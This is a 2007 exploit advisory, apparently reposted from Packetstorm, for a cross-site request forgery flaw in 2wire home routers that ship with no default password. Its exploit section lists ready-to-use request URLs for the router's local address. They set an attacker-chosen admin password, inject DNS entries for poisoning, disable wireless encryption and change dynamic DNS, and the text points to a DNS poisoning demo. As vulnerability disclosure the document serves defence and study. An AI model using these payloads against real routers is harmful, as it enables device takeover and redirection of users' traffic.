Lucene search
+L

2wire-csrf.txt

🗓️ 16 Aug 2007 00:00:00Reported by hkmType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 30 Views

2wire routers CSRF vulnerability, default password, configuration modification

Code
`Cross Site Request Forgery in 2wire routers  
  
Vulnerable Routers: 1701HG, 2071 Gateway  
Software: v3.17.5, 5.29.51 Password Not Set (default)  
  
  
Greetz a la Comunidad Underground de México, y a los  
que me ayudaron a probarlo: Preth00nker, nitr0us, ...  
[email protected]  
  
  
I. Background  
-------------  
This is the most popular router in Mexico and the default installation from the ISP has no system password.  
  
II. Vuln  
----------------  
It is possible to send a request to the router that will modify its configuration.  
  
It does not validate POST, or Referer or Anything...  
  
II. Exploit  
----------------  
We just need the client to do a request to the router with the configuration we desire.  
  
[examples]  
  
Set a password (NUEVOPASS):  
http://192.168.1.254/xslt?PAGE=A05_POST&THISPAGE=A05&NEXTPAGE=A05_POST&ENABLE_PASS=on&PASSWORD=NUEVOPASS&PASSWORD_CONF=NUEVOPASS  
  
Add names to the DNS (216.163.137.3 www.prueba.hkm):  
http://192.168.1.254/xslt?PAGE=J38_SET&THISPAGE=J38&NEXTPAGE=J38_SET&NAME=www.prueba.hkm&ADDR=216.163.137.3  
  
Disable Wireless Authentication  
http://192.168.1.254/xslt?PAGE=C05_POST&THISPAGE=C05&NEXTPAGE=C05_POST&NAME=encrypt_enabled&VALUE=0  
  
Set Dynamic DNS  
http://192.168.1.254/xslt?PAGE=J05_POST&THISPAGE=J05&NEXTPAGE=J05_POST&IP_DYNAMIC=TRUE  
  
Disable the Firewall  
Reset the device  
Etc...  
  
DNS Poisoning demo: http://www.hakim.ws/2wire/demodns.html  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation